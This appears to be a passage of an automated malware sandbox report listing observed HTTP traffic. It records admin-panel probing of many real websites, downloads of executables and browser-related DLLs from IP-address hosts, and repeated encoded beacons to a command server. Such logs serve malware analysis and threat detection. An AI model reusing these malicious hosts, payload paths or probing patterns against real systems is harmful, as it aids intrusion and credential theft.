                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gitam.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=f..OOXkXYg7C3sValW.JT9TBRtH489XDoqC0_PadtzA-1707131771-1-AdQ98SPZEFYHOKf/EpHVT80tuCLrv/AjblCtE2qBlyK+nQbJmWAUNuqsO2PsiP4D2Zes8WDOJjq83a7ZAzYrEUo=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EA298EECDFAB0EDA1FF6AD3E90D0B14C56C348EF11DCF1C015A556B18100061CDUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Host: cjdropshipping.comAccept: */*Accept-Encoding: deflate, gzipCookie: INGRESSCOOKIE=1707131772.255.15159.541229|f85a63221c8fd9b049d9a82e34821ae3; csrfToken=gyl8dbRELIEkZ6gzYC5izLX9; language=en|en; lng=enUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=7R8kW7naZWqCfxA+arozGXvDwGUAAAAAo66y6WgRP5rMrf2DD5XNTw==; visid_incap_2786379=nJ2nIEwwQtOC8ksVLl53JHrDwGUAAAAAQUIPAAAAAACXTPPl6ZJPhBOZf1gL0Zya; nlbi_2786379=Gm27FDXtdluMyfn/aJQkpgAAAAB2SWEC4z8u2KD9iiENxNubUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mojadovera.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: accounts.snapchat.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin HTTP/1.1Host: discord.comAccept: */*Accept-Encoding: deflate, gzipCookie: __sdcfduid=f7108151c41711eea0b60fe64c998bd492e66eddc076b200708bdc05ed2cbe73d6bf4f0f17b0d993defd8d35f71a55a6; __dcfduid=f7108150c41711eea0b60fe64c998bd4; __cfruid=4baa323db44e46bd4cae3cd0c49bbf604761a6e9-1707131767; _cfuvid=N0HwRwubMMJeHixqQ0_rL53YlfItOl_odb0sQeo9LRk-1707131767090-0-604800000User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://discord.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mw.redsa.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin HTTP/1.1Host: mitextoescolar.mineduc.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /Error/NotFound?aspxerrorpath=/phpmyadmin/ HTTP/1.0Host: ssc.nic.inAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: us04web.zoom.usAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=qAyyVUMtN.VwwaJ3DSunEJzUejWU4vbQ3oi8vft7Zmk-1707131771-1-AUpaUHNP7XBH7VoYl7WtbTOFNZTDujAHBqvdFHtA2TvZkyao3SyXavbmho30yF0TtYC7avtf6LVm95z/tp5urOI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: accounts.google.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://accounts.google.com/wp-login.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mega.nzAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: terna.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.0Host: oferta.senasofiaplus.edu.coAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE08EBDD9B7BE8AFE3F88D069A772BAB632F18933680BD0BFD5F16AEC6C3BF27FFUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin HTTP/1.1Host: ro.bongacams.comAccept: */*Accept-Encoding: deflate, gzipCookie: __cf_bm=sPlAOmI.SbF_K0Yty9SLocQQuQdWvCM6UlqNiDKSrHQ-1707131771-1-AZvJvOdJHH+VSfQDYfBdRd41atdb1A/vcpLWtYycbqzt0xc3vhWXbndMTivUeKm3/bUkXK+WsVKIU5M1CWciaxI=User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: tiktok.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: money-farm.ccAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: aeaaamorim.inovarmais.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: steamcommunity.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: sistemas.pa.gov.brAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: warriorplus.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: login.adf.lyAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: www.analvids.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mobilsam.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin/login HTTP/1.1Host: api.cmrsanmartin.ziz.clAccept: */*Accept-Encoding: deflate, gzipCookie: JSESSIONID=m6ZW6nO9UoY9k-niVSF6oRF4.cmrsanmartinUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: pxndx-mcr.boletia.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: m.codere.com.coAccept: */*Accept-Encoding: deflate, gzipCookie: incap_ses_1816_2786379=GmwLPGm/8ysfgRA+arozGXzDwGUAAAAAWc95nFYQh4VkaUEfADF5kQ==; visid_incap_2786379=hlpIXcn9RyeS5pqQjLHvrXzDwGUAAAAAQUIPAAAAAADprIzRk3UO2rMvvlyroBMr; nlbi_2786379=qQ7OL9ri/xfPwc9vaJQkpgAAAAAT6+z8Xi/STIi/imJ8KXK7User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: ucv.blackboard.comAccept: */*Accept-Encoding: deflate, gzipCookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE10F8662CA549F3FD503336620C511FF443E7315D4F16653F0D42A1913B3F30D1User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: poligrafosecuador.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: account.booking.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: testconnect.garena.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 3fba-180-252-166-236.ngrok.ioAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://3fba-180-252-166-236.ngrok.io/wp-login.php
                Source: global trafficHTTP traffic detected: GET /data/pdf/may.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: real.avalmag.com
                Source: global trafficHTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f0776.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.172.128.19
                Source: global trafficHTTP traffic detected: GET /check/index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: trmpc.com
                Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=four&s=ab HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.90Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 185.172.128.127Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.79Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /ping.php?substr=four HTTP/1.1User-Agent: NSIS_Inetc (Mozilla)Host: 5.42.64.33Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef810c3ee939b3c HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1Host: csefujt.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
